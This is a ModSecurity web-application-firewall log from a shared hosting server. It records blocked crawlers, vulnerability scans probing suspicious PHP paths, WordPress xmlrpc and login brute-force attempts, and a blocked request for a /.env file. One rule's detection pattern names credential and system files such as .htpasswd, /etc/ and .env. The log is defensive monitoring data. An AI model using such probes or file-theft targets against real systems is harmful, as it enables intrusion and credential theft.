[Tue May 26 12:44:17.374787 2026] [security2:error] [pid 448967:tid 449194] [client 74.7.175.179:56022] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "nicmaperu.com"] [uri "/robots.txt"] [unique_id "ahVIRuXLPuWQsfM-UVSSoQAAYWA"]
[Tue May 26 12:44:19.415945 2026] [security2:error] [pid 448967:tid 449171] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVISuXLPuWQsfM-UVSS_QAAAEo"]
[Tue May 26 12:44:23.159587 2026] [security2:error] [pid 448967:tid 449152] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVITuXLPuWQsfM-UVSTOwAAADc"]
[Tue May 26 12:44:23.429839 2026] [security2:error] [pid 448967:tid 449127] [client 114.119.128.77:53297] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/kitchener.php"] [unique_id "ahVIT-XLPuWQsfM-UVSTRQAAAB4"], referer: https://www.toronto121mortgage.com/
[Tue May 26 12:44:24.007538 2026] [security2:error] [pid 448967:tid 449221] [client 4.201.75.230:5897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/as.php"] [unique_id "ahVIUOXLPuWQsfM-UVSTUwAAAHw"]
[Tue May 26 12:44:24.566252 2026] [security2:error] [pid 448967:tid 449112] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIUOXLPuWQsfM-UVSTWQAAAA8"]
[Tue May 26 12:44:25.875537 2026] [security2:error] [pid 448967:tid 449208] [client 181.209.88.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIUeXLPuWQsfM-UVSTdAAAAG8"]
[Tue May 26 12:44:26.726738 2026] [security2:error] [pid 448967:tid 449111] [client 43.173.180.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVIUuXLPuWQsfM-UVSTgwAAAA4"]
[Tue May 26 12:44:27.323113 2026] [security2:error] [pid 448967:tid 449106] [client 157.20.138.61:56118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIU-XLPuWQsfM-UVSTlgAAAAk"]
[Tue May 26 12:44:27.323343 2026] [security2:error] [pid 448967:tid 449106] [client 157.20.138.61:56118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIU-XLPuWQsfM-UVSTlgAAAAk"]
[Tue May 26 12:44:27.596690 2026] [security2:error] [pid 448967:tid 449107] [client 4.201.75.230:6086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-trackback.php"] [unique_id "ahVIU-XLPuWQsfM-UVSTmwAAAAo"]
[Tue May 26 12:44:28.161839 2026] [security2:error] [pid 448967:tid 449190] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIU-XLPuWQsfM-UVSToAAAAF0"]
[Tue May 26 12:44:30.364604 2026] [security2:error] [pid 448967:tid 449149] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIVeXLPuWQsfM-UVST0AAAADQ"]
[Tue May 26 12:44:33.417266 2026] [security2:error] [pid 448967:tid 449215] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIWeXLPuWQsfM-UVSUCgAAAHY"]
[Tue May 26 12:44:34.099205 2026] [security2:error] [pid 448967:tid 449107] [client 161.123.54.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIWuXLPuWQsfM-UVSUIAAAAAo"]
[Tue May 26 12:44:34.900397 2026] [security2:error] [pid 448967:tid 449151] [client 4.201.75.230:5344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/about.php"] [unique_id "ahVIWuXLPuWQsfM-UVSUNQAAADY"]
[Tue May 26 12:44:34.920563 2026] [security2:error] [pid 448967:tid 449147] [client 161.123.54.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIWuXLPuWQsfM-UVSUMQAAADI"], referer: http://www.anujtradingco.com/pages/services-modern/
[Tue May 26 12:44:36.589184 2026] [security2:error] [pid 448967:tid 449172] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIXOXLPuWQsfM-UVSUVwAAAEs"]
[Tue May 26 12:44:37.686698 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:56471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIXeXLPuWQsfM-UVSUcwAAAA8"]
[Tue May 26 12:44:37.686880 2026] [security2:error] [pid 448967:tid 449112] [client 157.20.138.61:56471] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIXeXLPuWQsfM-UVSUcwAAAA8"]
[Tue May 26 12:44:38.241796 2026] [security2:error] [pid 448967:tid 449017] [remote 94.76.235.103:44172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVIXuXLPuWQsfM-UVSUfgAAPjE"]
[Tue May 26 12:44:38.761386 2026] [security2:error] [pid 448967:tid 449108] [client 4.201.75.230:5889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/file.php"] [unique_id "ahVIXuXLPuWQsfM-UVSUhgAAAAs"]
[Tue May 26 12:44:39.703064 2026] [security2:error] [pid 448967:tid 449217] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIX-XLPuWQsfM-UVSUkAAAAHg"]
[Tue May 26 12:44:40.051844 2026] [security2:error] [pid 448967:tid 449212] [client 4.201.75.230:5793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/adminfuns.php"] [unique_id "ahVIYOXLPuWQsfM-UVSUpQAAAHM"]
[Tue May 26 12:44:41.325430 2026] [security2:error] [pid 448967:tid 449147] [client 4.201.75.230:6051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-good.php"] [unique_id "ahVIYeXLPuWQsfM-UVSUugAAADI"]
[Tue May 26 12:44:42.496973 2026] [autoindex:error] [pid 448967:tid 449152] [client 43.153.205.132:42558] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:44:42.594328 2026] [security2:error] [pid 448967:tid 449104] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIYuXLPuWQsfM-UVSUygAAAAc"]
[Tue May 26 12:44:44.145611 2026] [security2:error] [pid 448967:tid 449162] [client 185.191.171.8:14088] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVIZOXLPuWQsfM-UVSU9QAAAEE"]
[Tue May 26 12:44:44.145776 2026] [security2:error] [pid 448967:tid 449162] [client 185.191.171.8:14088] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVIZOXLPuWQsfM-UVSU9QAAAEE"]
[Tue May 26 12:44:45.861834 2026] [security2:error] [pid 448967:tid 449140] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIZeXLPuWQsfM-UVSVEAAAACs"]
[Tue May 26 12:44:48.004151 2026] [security2:error] [pid 448967:tid 449164] [client 4.201.75.230:46032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/xmlrpc.php"] [unique_id "ahVIZ-XLPuWQsfM-UVSVRAAAAEM"]
[Tue May 26 12:44:48.293694 2026] [security2:error] [pid 448967:tid 449178] [client 157.20.138.61:56814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIaOXLPuWQsfM-UVSVUAAAAFE"]
[Tue May 26 12:44:48.293817 2026] [security2:error] [pid 448967:tid 449178] [client 157.20.138.61:56814] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIaOXLPuWQsfM-UVSVUAAAAFE"]
[Tue May 26 12:44:48.345241 2026] [security2:error] [pid 448967:tid 449112] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIZ-XLPuWQsfM-UVSVSQAAAA8"]
[Tue May 26 12:44:49.123179 2026] [security2:error] [pid 448967:tid 449116] [client 4.201.75.230:5526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/goods.php"] [unique_id "ahVIaeXLPuWQsfM-UVSVXAAAABM"]
[Tue May 26 12:44:49.641597 2026] [security2:error] [pid 448967:tid 449128] [client 202.76.175.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIaeXLPuWQsfM-UVSVXwAAAB8"]
[Tue May 26 12:44:50.508969 2026] [security2:error] [pid 448967:tid 449150] [client 4.201.75.230:5352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/class-t.api.php"] [unique_id "ahVIauXLPuWQsfM-UVSVfgAAADU"]
[Tue May 26 12:44:51.182708 2026] [security2:error] [pid 448967:tid 449221] [client 78.47.173.76:65106] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVIauXLPuWQsfM-UVSVhAAAAHw"], referer: http://ucdc.co.in/
[Tue May 26 12:44:51.377345 2026] [security2:error] [pid 448967:tid 449102] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIauXLPuWQsfM-UVSViAAAAAU"]
[Tue May 26 12:44:51.749426 2026] [security2:error] [pid 448967:tid 449112] [client 4.201.75.230:46034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/sf.php"] [unique_id "ahVIa-XLPuWQsfM-UVSVoQAAAA8"]
[Tue May 26 12:44:53.680970 2026] [security2:error] [pid 448967:tid 449117] [client 176.65.139.237:64858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.me.moes-art.com"] [uri "/.env"] [unique_id "ahVIbeXLPuWQsfM-UVSVyQAAABQ"]
[Tue May 26 12:44:54.250291 2026] [security2:error] [pid 448967:tid 449097] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIbeXLPuWQsfM-UVSVzwAAAAA"]
[Tue May 26 12:44:57.056341 2026] [security2:error] [pid 448967:tid 449211] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIcOXLPuWQsfM-UVSWAAAAAHI"]
[Tue May 26 12:44:58.916207 2026] [security2:error] [pid 448967:tid 449133] [client 47.128.47.213:48666] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahVIcuXLPuWQsfM-UVSWMAAAACQ"]
[Tue May 26 12:44:58.930476 2026] [security2:error] [pid 448967:tid 449170] [client 157.20.138.61:57162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIcuXLPuWQsfM-UVSWKgAAAEk"]
[Tue May 26 12:44:58.930610 2026] [security2:error] [pid 448967:tid 449170] [client 157.20.138.61:57162] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIcuXLPuWQsfM-UVSWKgAAAEk"]
[Tue May 26 12:45:01.329929 2026] [security2:error] [pid 448967:tid 449179] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIdOXLPuWQsfM-UVSWUwAAAFI"]
[Tue May 26 12:45:02.169621 2026] [security2:error] [pid 448967:tid 449101] [client 4.201.75.230:46036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/kbfr.php"] [unique_id "ahVIduXLPuWQsfM-UVSWdgAAAAQ"]
[Tue May 26 12:45:02.927872 2026] [security2:error] [pid 448967:tid 449167] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIduXLPuWQsfM-UVSWfwAAAEY"]
[Tue May 26 12:45:03.904394 2026] [security2:error] [pid 448967:tid 449213] [client 2a00:17d8:200::f1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVId-XLPuWQsfM-UVSWlwAAdHQ"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 12:45:04.339700 2026] [security2:error] [pid 448967:tid 449207] [client 4.201.75.230:46051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/chosen.php"] [unique_id "ahVIeOXLPuWQsfM-UVSWpQAAAG4"]
[Tue May 26 12:45:05.270674 2026] [security2:error] [pid 448967:tid 449159] [client 4.201.75.230:46023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/defaults.php"] [unique_id "ahVIeeXLPuWQsfM-UVSWuQAAAD4"]
[Tue May 26 12:45:05.795449 2026] [security2:error] [pid 448967:tid 449110] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIeeXLPuWQsfM-UVSWvAAAAA0"]
[Tue May 26 12:45:06.798571 2026] [security2:error] [pid 448967:tid 449192] [client 109.70.100.12:33932] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "109.70.100.12" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVIeuXLPuWQsfM-UVSW3AAAAF8"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 12:45:06.798718 2026] [security2:error] [pid 448967:tid 449192] [client 109.70.100.12:33932] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVIeuXLPuWQsfM-UVSW3AAAAF8"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 12:45:08.158259 2026] [security2:error] [pid 448967:tid 449222] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIe-XLPuWQsfM-UVSW7gAAAH0"]
[Tue May 26 12:45:09.429985 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:57517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIfeXLPuWQsfM-UVSXGAAAABE"]
[Tue May 26 12:45:09.430166 2026] [security2:error] [pid 448967:tid 449114] [client 157.20.138.61:57517] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIfeXLPuWQsfM-UVSXGAAAABE"]
[Tue May 26 12:45:10.502657 2026] [security2:error] [pid 448967:tid 448997] [remote 124.156.212.23:51154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVIfuXLPuWQsfM-UVSXJQAAAx0"]
[Tue May 26 12:45:10.947700 2026] [security2:error] [pid 448967:tid 449104] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIfuXLPuWQsfM-UVSXLgAAAAc"]
[Tue May 26 12:45:11.724751 2026] [security2:error] [pid 448967:tid 449215] [client 4.201.75.230:46035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/info.php"] [unique_id "ahVIf-XLPuWQsfM-UVSXQAAAAHY"]
